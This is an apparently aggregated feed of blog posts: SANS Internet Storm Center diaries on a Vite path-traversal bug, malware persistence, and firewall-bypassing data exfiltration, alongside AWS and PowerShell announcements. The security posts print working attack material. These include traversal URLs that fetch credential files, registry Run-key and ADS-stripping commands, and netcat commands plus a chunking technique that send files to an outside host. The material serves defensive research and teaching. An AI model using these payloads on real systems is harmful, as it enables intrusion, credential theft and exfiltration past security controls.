Attempts to Exploit Exposed "Vite" Installs (CVE-2025-30208), (Thu, Apr 2nd)

This post was originally published on this site

From its GitHub repo: "Vite (French word for "quick", pronounced /vi?t/, like "veet") is a new breed of frontend build tooling that significantly improves the frontend development experience" [https://github.com/vitejs/vite].

This environment introduces some neat and useful shortcuts to make developers' lives simpler. But as so often, if exposed, these features can be turned against you.

Today, I noticed our honeypots collecting URLs like:

/@fs/../../../../../etc/environment?raw??
/@fs/etc/environment?raw??
/@fs/home/app/.aws/credentials?raw??

and many more like it. The common denominator is the prefix "/@fs/" and the ending '?raw??'. This pattern matches CVE-2025-30208, a vulnerability in Vite described by Offsec.com in July last year [https://www.offsec.com/blog/cve-2025-30208/]. 

The '@fs' feature is a Vite prefix for retrieving files from the server. To protect the server's file system, Vite implements configuration directives to restrict access to specific directories. However, the '??raw?' suffix can be used to bypass the access list and download arbitrary files. Scanning activity on port 5173 is quite low, and the attacks we have seen use standard web server ports.

Vite is typically listening on port 5173. It should be installed such that it is only reachable via localhost, but apparently, at least attackers believe that it is often exposed. The attacks we are seeing are attempting to retrieve various well-known configuration files, likely to extract secrets. 


Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Announcing managed daemon support for Amazon ECS Managed Instances

This post was originally published on this site

Today, we’re announcing managed daemon support for Amazon Elastic Container Service (Amazon ECS) Managed Instances. This new capability extends the managed instances experience we introduced in September 2025, by giving platform engineers independent control over software agents such as monitoring, logging, and tracing tools, without requiring coordination with application development teams, while also improving reliability by ensuring every instance consistently runs required daemons and enabling comprehensive host-level monitoring.

When running containerized workloads at scale, platform engineers manage a wide range of responsibilities, from scaling and patching infrastructure to keeping applications running reliably and maintaining the operational agents that support those applications. Until now, many of these concerns were tightly coupled. Updating a monitoring agent meant coordinating with application teams, modifying task definitions, and redeploying entire applications, a significant operational burden when you’re managing hundreds or thousands of services.

Decoupled lifecycle management for daemons
Amazon ECS now introduces a dedicated managed daemons construct that enables platform teams to centrally manage operational tooling. This separation of concerns allows platform engineers to independently deploy and update monitoring, logging, and tracing agents to infrastructure, while enforcing consistent use of required tools across all instances, without requiring application teams to redeploy their services. Daemons are guaranteed to start before application tasks and drain last, ensuring that logging, tracing, and monitoring are always available when your application needs them.

Platform engineers can deploy managed daemons across multiple capacity providers, or target specific capacity providers, giving them flexibility in how they roll out agents across their infrastructure. Resource management is also centralized, allowing teams to define daemon CPU and memory parameters separately from application configurations with no need to rebuild AMIs or update task definitions, while optimizing resource utilization since each instance runs exactly one daemon copy shared across multiple application tasks.

Let’s try it out
To take ECS Managed Daemons for a spin, I decided to start with the Amazon CloudWatch Agent as my first managed daemon. I had previously set up an Amazon ECS cluster with a Managed Instance capacity provider using the documentation.

From the Amazon Elastic Container Service console, I noticed a new Daemon task definitions option in the navigation pane, where I can define my managed daemons.

Managed daemons console

I chose Create new daemon task definition to get started. For this example, I configured the CloudWatch Agent with 1 vCPU and 0.5 GB of memory. In the Daemon task definition family field, I entered a name I’d recognize later.

For the Task execution role, I selected ecsTaskExecutionRole from the dropdown. Under the Container section, I gave my container a descriptive name and pasted in the image URI: public.ecr.aws/cloudwatch-agent/cloudwatch-agent:latest along with a few additional details.

After reviewing everything, I chose Create.

Once my daemon task definition was created, I navigated to the Clusters page, selected my previously created cluster and found the new Daemons tab.

Managed daemons 2

Here I can simply click the Create daemon button and complete the form to configure my daemon.

Managed daemons 3

Under Daemon configuration, I selected my newly created daemon task definition family and then assigned my daemon a name. For Environment configuration, I selected the ECS Managed Instances capacity provider I had set up earlier. After confirming my settings, I chose Create.

Now ECS automatically ensures the daemon task launches first on every provisioned ECS managed instance in my selected capacity provider. To see this in action, I deployed a sample nginx web service as a test workload. Once my workload was deployed, I could see in the console that ECS Managed Daemons had automatically deployed the CloudWatch Agent daemon alongside my application, with no manual intervention required.

When I later updated my daemon, ECS handled the rolling deployment automatically by provisioning new instances with the updated daemon, starting the daemon first, then migrating application tasks to the new instances before terminating the old ones. This “start before stop” approach ensures continuous daemon coverage: your logging, monitoring, and tracing agents remain operational throughout the update with no gaps in data collection. The drain percentage I configured controlled the pace of this replacement, giving me complete control over addon updates without any application downtime.

How it works
The managed daemon experience introduces a new daemon task definition that is separate from task definitions, with its own parameters and validation scheme. A new daemon_bridge network mode enables daemons to communicate with application tasks while remaining isolated from application networking configurations.

Managed daemons support advanced host-level access capabilities that are essential for operational tooling. Platform engineers can configure daemon tasks as privileged containers, add additional Linux capabilities, and mount paths from the underlying host filesystem. These capabilities are particularly valuable for monitoring and security agents that require deep visibility into host-level metrics, processes, and system calls.

When a daemon is deployed, ECS launches exactly one daemon process per container instance before placing application tasks. This guarantees that operational tooling is in place before your application starts receiving traffic. ECS also supports rolling deployments with automatic rollbacks, so you can update agents with confidence.

Now available
Managed daemon support for Amazon ECS Managed Instances is available today in all AWS Regions. To get started, visit the Amazon ECS console or review the Amazon ECS documentation. You can also explore the new managed daemons Application Programming Interface (APIs) by visiting this website.

There is no additional cost to use managed daemons. You pay only for the standard compute resources consumed by your daemon tasks.

PowerShell 7.6 release postmortem and investments

This post was originally published on this site

We recently released PowerShell 7.6, and we want to take a moment to share context on the delayed
timing of this release, what we learned, and what we’re already changing as a result.

PowerShell releases typically align closely with the .NET release schedule. Our goal is to provide
predictable and timely releases for our users. For 7.6, we planned to release earlier in the cycle,
but ultimately shipped in March 2026.

What goes into a PowerShell release

Building and testing a PowerShell release is a complex process with many moving parts:

  • 3 to 4 release versions of PowerShell each month (e.g. 7.4.14, 7.5.5, 7.6.0)
  • 29 packages in 8 package formats
  • 4 architectures (x64, Arm64, x86, Arm32)
  • 8 operating systems (multiple versions each)
  • Published to 4 repositories (GitHub, PMC, winget, Microsoft Store) plus a PR to the .NET SDK image
  • 287,855 total tests run across all platforms and packages per release

What happened

The PowerShell 7.6 release was delayed beyond its original target and ultimately shipped in March
2026.

During the release cycle, we encountered a set of issues that affected packaging, validation, and
release coordination. These issues emerged late in the cycle and reduced our ability to validate
changes and maintain release cadence.

Combined with the standard December release pause, these factors extended the overall release
timeline.

Timeline

  • October 2025 – Packaging-related changes were introduced as part of ongoing work for the 7.6
    release.

    • Changes to the build created a bug in 7.6-preview.5 that caused the Alpine package to fail. The
      method used in the new build system to build the Microsoft.PowerShell.Native library wasn’t
      compatible with Alpine. This required additional changes for the Alpine build.
  • November 2025 – Additional compliance requirements were imposed requiring changes to packaging
    tooling for non-Windows platforms.

    • Because of the additional work created by these requirements, we weren’t able to ship the fixes
      made in October until December.
  • December 2025 – We shipped 7.6-preview.6, but due to the holidays there were complications
    caused by a change freeze and limited availability of key personnel.

    • We weren’t able to publish to PMC during the holiday freeze.
    • We couldn’t publish NuGet packages because the current manual process limits who can perform the
      task.
  • January 2026 – Packaging changes required deeper rework than initially expected and validation
    issues began surfacing across platforms.

    • We also discovered a compatibility issue in RHEL 8. The libpsl-native library must be built to
      support glibc 2.28 rather than glibc 2.33 used by RHEL 9 and higher.
  • February 2026 – Ongoing fixes, validation, and backporting of packaging changes across release
    branches continued.
  • March 2026 – Packaging changes stabilized, validation completed, and PowerShell 7.6 was
    released.

What went wrong and why

Several factors contributed to the delay beyond the initial packaging change.

  • Late-cycle packaging system changes
    A compliance requirement required us to replace the tooling used to generate non-Windows packages (RPM, DEB, PKG). We evaluated whether this could be addressed with incremental changes, but determined that the existing tooling could not be adapted to meet requirements. This required a
    full replacement of the packaging workflow.Because this change occurred late in the release cycle, we had limited time to validate the new system across all supported platforms and architectures.
  • Tight coupling to packaging dependencies
    Our release pipeline relied on this tooling as a critical dependency. When it became unavailable, we did not have an alternate implementation ready. This forced us to create a replacement for a core part of the release pipeline, from scratch, under time pressure, increasing both risk and complexity.
  • Reduced validation signal from previews
    Our preview cadence slowed during this period, which reduced opportunities to validate changes incrementally. As a result, issues introduced by the packaging changes were discovered later in the cycle, when changes were more expensive to correct.
  • Branching and backport complexity
    Because of new compliance requirements, changes needed to be backported and validated across multiple active branches. This increased the coordination overhead and extended the time required to reach a stable state.
  • Release ownership and coordination gaps
    Release ownership was not explicitly defined, particularly during maintainer handoffs. This made it difficult to track progress, assign responsibility for blockers, and make timely decisions during critical phases of the release.
  • Lack of early risk signals
    We did not have clear signals indicating that the release timeline was at risk. Without structured tracking of release health and ownership, issues accumulated without triggering early escalation or communication.

How we responded

As the scope of the issue became clear, we shifted from attempting incremental fixes to stabilizing
the packaging system as a prerequisite for release.

  • We evaluated patching the existing packaging workflow versus replacing it, and determined a full
    replacement was required to meet compliance requirements.
  • We rebuilt the packaging workflows for non-Windows platforms, including RPM, DEB, and PKG formats.
  • We validated the new packaging system across all supported architectures and operating systems to
    ensure correctness and consistency.
  • We backported the updated packaging logic across active release branches to maintain alignment
    between versions.
  • We coordinated across maintainers to prioritize stabilization work over continuing release
    progression with incomplete validation.

This shift ensured a stable and compliant release, but extended the overall timeline as we
prioritized correctness and cross-platform consistency over release speed.

Detection gap

A key gap during this release cycle was the lack of early signals indicating that the packaging
changes would significantly impact the release timeline.

Reduced preview cadence and late-cycle changes limited our ability to detect issues early.
Additionally, the absence of clear release ownership and structured tracking made it more difficult
to identify and communicate risk as it developed.

What we are doing to improve

This experience highlighted several areas where we can improve how we deliver releases. We’ve
already begun implementing changes:

  • Clear release ownership
    We have established explicit ownership for each release, with clear responsibility and transfer mechanisms between maintainers.
  • Improved release tracking
    We are using internal tracking systems to make release status and blockers more visible across the team.
  • Consistent preview cadence
    We are reinforcing a regular preview schedule to surface issues earlier in the cycle.
  • Reduced packaging complexity
    We are working to simplify and consolidate packaging systems to make future updates more predictable.
  • Improved automation
    We are exploring additional automation to reduce manual steps and improve reliability in the face of changing requirements.
  • Better communication signals
    We are identifying clearer signals in the release process to notify the community earlier when timelines are at risk. Going forward, we will share updates through the PowerShell repository discussions.

Moving forward

We understand that many of you rely on PowerShell releases to align with your own planning and
validation cycles. Improving release predictability and transparency is a priority for the team, and
these changes are already in progress.

We appreciate the feedback and patience we received from the community as we worked through these
changes, and we’re committed to continuing to improve how we deliver PowerShell.

— The PowerShell Team

The post PowerShell 7.6 release postmortem and investments appeared first on PowerShell Team.

TeamPCP Supply Chain Campaign: Update 005 – First Confirmed Victim Disclosure, Post-Compromise Cloud Enumeration Documented, and Axios Attribution Narrows, (Wed, Apr 1st)

This post was originally published on this site

This is the fifth update to the TeamPCP supply chain campaign threat intelligence report, "When the Security Scanner Became the Weapon" (v3.0, March 25, 2026). Update 004 covered developments through March 30, including the Databricks investigation, dual ransomware operations, and AstraZeneca data release. This update consolidates two days of intelligence through April 1, 2026.

Malicious Script That Gets Rid of ADS, (Wed, Apr 1st)

This post was originally published on this site

Today, most malware are called “fileless” because they try to reduce their footprint on the infected computer filesystem to the bare minimum. But they need to write something… think about persistence. They can use the registry as an alternative storage location.

But some scripts still rely on files that are executed at boot time. For example, via a “Run” key:

reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionRun" /v csgh4Pbzclmp /t REG_SZ /d ""%APPDATA%MicrosoftWindowsTemplatesdwm.cmd"" /f >nul 2>&1

The file located in %APPDATA% will be executed at boot time.

From the attacker’s point of view, there is a problem: The original script copies itself:

copy /Y "%~f0" "%APPDATA%MicrosoftWindowsTemplatesdwm.cmd" >nul 2>&1

Just after the copy operation, a PowerShell one-liner is executed:

powershell -w h -c "try{Remove-Item -Path '%APPDATA%MicrosoftWindowsTemplatesdwm.cmd:Zone.Identifier' -Force -ErrorAction SilentlyContinue}catch{}" >nul 2>&1

PowerShell will try to remove the alternate-data-stream (ADS) “:Zone.Identifier” that Windows adds during file operations. The :Zone.Identifier indicates the source of the file (1 = My Computer, 2 = Local intranet, 3 = Trusted sites, 4 = Internet, 5 = Restricted sites). It's not clear if a "copy" will drop or conserver the ADS. I did not find an official Microsoft documentation but, if you ask to a LLM, it will tell you that they are not preserved. They are wrong!

In my Windows 10 lab, I downloaded a copy of BinaryNinja. An ADS was added to the file. After a copy to "test.ext", the new file has still the ADS!

By removing the ADS, the malicious script makes the file look less suspicious if the system is scanned to search for "downloaded" files (a classic operation performed in DFIR investigations). 

For the story, the script will later invoke another PowerShell that will drop a DonutLoader on the victim's computer.

Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Announcing the AWS Sustainability console: Programmatic access, configurable CSV reports, and Scope 1–3 reporting in one place

This post was originally published on this site

As many of you are, I’m a parent. And like you, I think about the world I’m building for my children. That’s part of why today’s launch matters for many of us. I’m excited to announce the launch of the AWS Sustainability console, a standalone service that consolidates all AWS sustainability reporting and resources in one place.

With the The Climate Pledge, Amazon set a goal in 2019 to reach net-zero carbon across our operations by 2040. That commitment shapes how AWS builds its data centers and services. In addition, AWS is also committed to helping you measure and reduce the environmental footprint of your own workloads. The AWS Sustainability console is the latest step in that direction.

The AWS Sustainability console builds on the Customer Carbon Footprint Tool (CCFT), which lives inside the AWS Billing console, and introduces a new set of capabilities for which you’ve been asking.

Until now, accessing your carbon footprint data required billing-level permissions. That created a practical problem: sustainability professionals and reporting teams often don’t have (and shouldn’t need) access to cost and billing data. Getting the right people access to the right data meant navigating permission structures that weren’t designed with sustainability workflows in mind. The AWS Sustainability console has its own permissions model, independent of the Billing console. Sustainability professionals can now get direct access to emissions data without requiring billing permissions to be granted alongside it.

The console includes Scope 1, 2, and 3 emissions attributed to your AWS usage and shows you a breakdown by AWS Region, service, such as Amazon CloudFront, Amazon Elastic Compute Cloud (Amazon EC2), and Amazon Simple Storage Service (Amazon S3). The underlying data and methodology haven’t changed with this launch; these are the same as the ones used by the CCFT. We changed how you can access and work with the data.

As sustainability reporting requirements have grown more complex, teams need more flexibility accessing and working with their emissions data. The console now includes a Reports page where you can download preset monthly and annual carbon emissions reports covering both market-based method (MBM) and location-based method (LBM) data. You can also build a custom comma-separated values (CSV) report by selecting which fields to include, the time granularity, and other filters.

If your organization’s fiscal year doesn’t align with the calendar year, you can now configure the console to match your reporting period. When that is set, all data views and exports reflect your fiscal year and quarters, which removes a common friction point for finance and sustainability teams working in parallel.

You can also use the new API or the AWS SDKs to integrate emissions data into your own reporting pipelines, dashboards, or compliance workflows. This is useful for teams that need to pull data for a specific month across a large number of accounts without setting up a data export or for organizations that need to establish custom account groupings that don’t align with their existing AWS Organizations structure.

You can read about the latest features released and methodology updates directly on the Release notes page on the Learn more tab.

Lets see it in action
To show you the Sustainability console, I opened the AWS Management Console and searched for “sustainability” in the search bar at the top of the screen.

Sustainability console - carbon emission 1

Sustainability console - carbon emission 2

The Carbon emissions section gives an estimate on your carbon emissions, expressed in metric tons of carbon dioxide equivalent (MTCO2e). It shows the emissions by scope, expressed in the MBM and the LBM. On the right side of the screen, you can adjust the date range or filter by service, Regions, and more.

For those unfamiliar: Scope 1 includes direct emissions from owned or controlled sources (for example, data center fuel use); Scope 2 covers indirect emissions from the production of purchased energy (with MBM accounting for energy attribute certificates and LBM using average local grid emissions); and Scope 3 includes other indirect emissions across the value chain, such as server manufacturing and data center construction. You can read more about this in our methodology document, which was independently verified by Apex, a third-party consultant.

I can also use API or AWS Command Line Interface (AWS CLI) to programmatically pull the emissions data.

aws sustainability get-estimated-carbon-emissions 
     --time-period='{"Start":"2025-03-01T00:00:00Z","End":"2026-03-01T23:59:59.999Z"}'

{
    "Results": [
        {
            "TimePeriod": {
                "Start": "2025-03-01T00:00:00+00:00",
                "End": "2025-04-01T00:00:00+00:00"
            },
            "DimensionsValues": {},
            "ModelVersion": "v3.0.0",
            "EmissionsValues": {
                "TOTAL_LBM_CARBON_EMISSIONS": {
                    "Value": 0.7,
                    "Unit": "MTCO2e"
                },
                "TOTAL_MBM_CARBON_EMISSIONS": {
                    "Value": 0.1,
                    "Unit": "MTCO2e"
                }
            }
        },
...

The combination of the visual console and the new API gives you two additional ways to work with your data, in addition to the Data Exports still available. You can now explore and identify hotspots on the console and automate the reporting you want to share with stakeholders.

The Sustainability console is designed to grow. We plan to continue to release new features as we grow the console’s capabilities alongside our customers.

Get started today
The AWS Sustainability console is available today at no additional cost. You can access it from the AWS Management Console. Historical data is available going back to January 2022, so you can start exploring your emissions trends right away.

Get started on the console today. If you want to learn more about the AWS commitment to sustainability, visit the AWS Sustainability page.

— seb

Application Control Bypass for Data Exfiltration, (Tue, Mar 31st)

This post was originally published on this site

In case of a cyber incident, most organizations fear more of data loss (via exfiltration) than regular data encryption because they have a good backup policy in place. If exfiltration happened, it means a total loss of control of the stolen data with all the consequences (PII, CC numbers, …).

While performing a security assessment of a corporate network, I discovered that a TCP port was open to the wild Internet, even if the audited company has a pretty strong firewall policy. The open port was discovered via a regular port scan. In such situation, you try to exploit this "hole" in the firewall. What I did, I tried to exfiltrate data through this port. It’s easy: Simulate a server controlled by a threat actor:

root@attacker:~# nc -l -p 12345 >/tmp/victim.tgz

And, from a server on the victim’s network:

root@victim:~# tar czvf - /juicy/data/to/exfiltrate | nc wild.server.com 12345

It worked but the data transfer failed after approximatively ~5KB of data sent… weird! Every time, the same situation. I talked to a local Network Administrator who said that they have a Palo Alto Networks firewall in place with App-ID enabled on this port.

Note: What I am explaining here is not directly related to this brand of firewall. The same issue may apply with any “next-generation” firewall! For example, Checkpoint firewalls use the App Control blade and Fortinet firewalls use “Application Control”.

App-ID in Palo Alto Networks firewalls is the component performing traffic classification on the protected network(s), regardless of port, protocol, or encryption. Instead of relying on traditional port-based rules (e.g., TCP/80 == HTTP), App-ID analyzes traffic in real time to determine the actual application (e.g., Facebook, Dropbox, custom apps), enabling more granular and accurate security policies. This allows administrators to permit, deny, or control applications directly, apply user-based rules, and enforce security profiles (IPS, URL filtering, etc.) based on the true nature of the traffic rather than superficial indicators like ports. This also prevent well-known protocols to be used on exotic ports (ex: SSH over 12222).

The main issue with this technique is that enough packets must be sent over the wire to perform a good classification. So, the traffic is always allowed first and, if something bad is detected, remaining packets are blocked.

In terms of data volume, there’s no strict fixed threshold, but in practice App-ID usually needs at least the first few KB of application payload to reach a reliable classification. Roughly speaking:

  • <1 KB (or just handshake packets): almost always insufficient → likely unknown or very generic classification
  • ~1–5 KB: basic identification possible for simple or clear-text protocols (HTTP, DNS, some TLS SNI-based detection)
  • ~5–10+ KB: much higher confidence, especially for encrypted or complex applications

That’s why my attempts to exfiltrate data were all blocked after ~5KB.

Can we bypass this? Let’s try the following scenario:

On the external host (managed by me,  the "Threat Actor"), let’s execute a netcat in an infinite loop with a small timeout (because the firewall won’t drop the connection, just block packets:

i=0
while true; do
    filename=$(printf "/tmp/chunk_%04d.bin" "$i")
    nc -l -p 12345 -v -v -w 5 >$filename
    echo "Dumped $filename"
    ((i++))
done

On the victim’s computer, I (vibe-)coded a Python script that will perform the following tasks:
– Read a file
– Split it in chunks of 3KB
– Send everything to a TCP connection (with retries in case of failure of couse)

The code is available on Pastebin[1]. Example:

root@victim:~# sha256sum data.zip
955587e24628dc46c85a7635cae888832113e86e6870cba0312591c44acf9833  data.zip
root@victim:~# python3 send_file.py data.zip wild.server.com 12345
File: 'data.zip' ((359370 bytes) -> 117ll chunk(s) of up to 3072 bytes.
Destination: wild.server.com:12345  (timeout=5s, max_retries=10)

  Chunk 1/1177 sent successfully (attempt 1).
  Chunk 2/1177 sent successfully (attempt 1).
  Chunk 3/1177 sent successfully (attempt 1).
  Chunk 4/1177 sent successfully (attempt 1).
  Chunk 5/1177 sent successfully (attempt 1).
  Chunk 6/1177 sent successfully (attempt 1).
  Chunk 7/1177 sent successfully (attempt 1).
  Chunk 8/1177 sent successfully (attempt 1).
  Chunk 9/1177 sent successfully (attempt 1).
  Chunk 10/1177 sent successfully (attempt 1).
  Chunk 11/1177 sent successfully (attempt 1).
  Chunk 12/1177 sent successfully (attempt 1).
  [...]

And on the remote side, chunks are created, you just need to rebuild the original file:

root@attacker:~# cat /tmp/chunk_0* >victim.zip
root@attacker:~# sha256sum victim.zip
955587e24628dc46c85a7635cae888832113e86e6870cba0312591c44acf9833  victim.zip

The file has been successfully exfiltrated! (the SHA256 hashes are identical). Of course, it's slow but it does not generate peaks of bandwidth that could reveal a huge amount of data being exfiltrated!

This technique worked for me with a file of a few megabytes. It is more a proof-of-concept because firewalls may implement more detection controls. For example, this technique is easy to detect due to the high number of small TCP connections that may look like malware beaconing. It could be also useful to encrypt your data because packets could be flagged by the IDS component of the firewall… 

[1] https://pastebin.com/Ct9ePEiN

Xavier Mertens (@xme)
Xameco
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

TeamPCP Supply Chain Campaign: Update 004 – Databricks Investigating Alleged Compromise, TeamPCP Runs Dual Ransomware Operations, and AstraZeneca Data Released, (Mon, Mar 30th)

This post was originally published on this site

This is the fourth update to the TeamPCP supply chain campaign threat intelligence report, "When the Security Scanner Became the Weapon" (v3.0, March 25, 2026). Update 003 covered developments through March 28, including the first 48-hour pause in new compromises and the campaign's shift to monetization. This update consolidates intelligence from March 28-30, 2026 — two days since our last update.

DShield (Cowrie) Honeypot Stats and When Sessions Disconnect, (Mon, Mar 30th)

This post was originally published on this site

A lot of the information seen on DShield honeypots [1] is repeated bot traffic, especially when looking at the Cowrie [2] telnet and SSH sessions. However, how long a session lasts, how many commands are run per session and what the last commands run before a session disconnects can vary. Some of this information could help indicate whether a session is automated and if a honeypot was fingerprinted. This information can also be used to find more interesting honeypot sessions.

TeamPCP Supply Chain Campaign: Update 003 – Operational Tempo Shift as Campaign Enters Monetization Phase With No New Compromises in 48 Hours, (Sat, Mar 28th)

This post was originally published on this site

This is the third update to the TeamPCP supply chain campaign threat intelligence report, "When the Security Scanner Became the Weapon" (v3.0, March 25, 2026). Update 002 covered developments through March 27, including the Telnyx PyPI compromise and Vect ransomware partnership. This update covers developments from March 27-28, 2026.